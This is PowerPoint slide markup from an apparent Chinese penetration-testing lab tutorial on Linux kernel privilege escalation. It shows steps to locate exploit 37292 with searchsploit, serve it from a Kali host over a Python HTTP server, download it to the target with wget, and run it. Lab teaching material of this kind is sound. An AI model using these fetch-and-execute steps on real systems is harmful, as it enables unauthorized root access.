      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D593F370-8654-493C-ACA5-388FD1FFA0C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect t="30185"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="963591" y="1214873"/>
            <a:ext cx="6235088" cy="2495359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73BB67CC-F36D-41C9-93EA-BE502A905562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="3020" t="43107" r="56001" b="24742"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825151" y="3429000"/>
            <a:ext cx="5899324" cy="2650765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33A2AFCA-4141-4D35-8C9C-9F57A06E2926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963591" y="4056564"/>
            <a:ext cx="3980549" cy="167686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fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>searchsploit 37292 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>并下载攻击脚本</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靶场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>无法gcc编译，vim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>改脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，设定编译器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为cc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2087560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内核提权：传输漏洞脚本文件到靶机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F66968-5007-4F32-B15B-D00923865057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect b="73245"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766454" y="1372808"/>
            <a:ext cx="10417015" cy="2056192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71103DD-FAED-43FE-87FC-B5EB4DC68132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665881" y="3623092"/>
            <a:ext cx="6489832" cy="223708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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>机上打开新的终端，开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</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742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN"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rPr>
              <a:t>python -m http.server 8081</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="20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把攻击脚本下载到靶机上</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742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN"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rPr>
              <a:t>wget http://192.168.194.141:8081/37292.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA8ECEEE-E95C-49F7-88E1-6882A3CB26C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5747684" y="3665136"/>
            <a:ext cx="5435785" cy="1076499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="977188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光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>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内核提权：执行脚本文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58333718-FD86-4D0E-91F2-A30ACEB786AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1" t="25260" r="1330"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558182" y="1254642"/>
            <a:ext cx="9075636" cy="5071730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690406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8B14D1-5EAC-4366-9A6C-6D5ABF886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651" y="0"/>
            <a:ext cx="9208698" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3876348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25968" t="999" r="-7735" b="32257"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="259905"/>
            <a:ext cx="12111612" cy="6598095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689475" y="1073821"/>
            <a:ext cx="2813049" cy="739581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4780419" y="2677996"/>
            <a:ext cx="2631160" cy="1345282"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>谢谢！</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16200000">
            <a:off x="9138317" y="-274993"/>
            <a:ext cx="2309390" cy="3379972"/>
            <a:chOff x="9687578" y="-1036798"/>
            <a:chExt cx="2309390" cy="3379972"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9734286" y="-1014852"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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161155" y="-1019241"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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588025" y="-1023631"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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014895" y="-1028020"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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1441765" y="-1032409"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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868635" y="-1036798"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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729096" y="-655997"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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155965" y="-660386"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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582835" y="-664776"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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009705" y="-669165"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1436575" y="-673554"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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863445" y="-677943"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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723906" y="-297142"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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150775" y="-301531"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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0577645" y="-305921"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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004515" y="-310310"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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1431385" y="-314699"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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858255" y="-319088"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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718716" y="61712"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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145585" y="57323"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0572455" y="52933"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0999325" y="48544"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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426195" y="44155"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1853065" y="39766"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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713527" y="420567"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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140396" y="416178"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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567266" y="411788"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0994136" y="407399"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1421006" y="403010"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1847876" y="398621"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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708337" y="779422"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0135206" y="775033"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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562076" y="770643"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0988946" y="766254"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1415816" y="761865"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1842686" y="757476"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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703147" y="1138277"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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130016" y="1133888"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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0556886" y="1129498"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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0983756" y="1125109"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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410626" y="1120720"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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1837496" y="1116331"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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697957" y="1497131"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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124826" y="1492742"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0551696" y="1488352"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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0978566" y="1483963"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1405436" y="1479574"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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1832306" y="1475185"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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9692768" y="1855986"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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119637" y="1851597"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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546507" y="1847207"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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973377" y="1842818"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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400247" y="1838429"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2525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11827117" y="1834040"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25257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9687578" y="2214841"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="252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10114447" y="2210452"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="252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541317" y="2206062"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="252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10968187" y="2201673"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="252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1395057" y="2197284"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="252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1821927" y="2192895"/>
              <a:ext cx="128333" cy="128333"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="252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6" name="图片 65"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect b="-103"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="6464305" cy="6865039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="图片 66"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
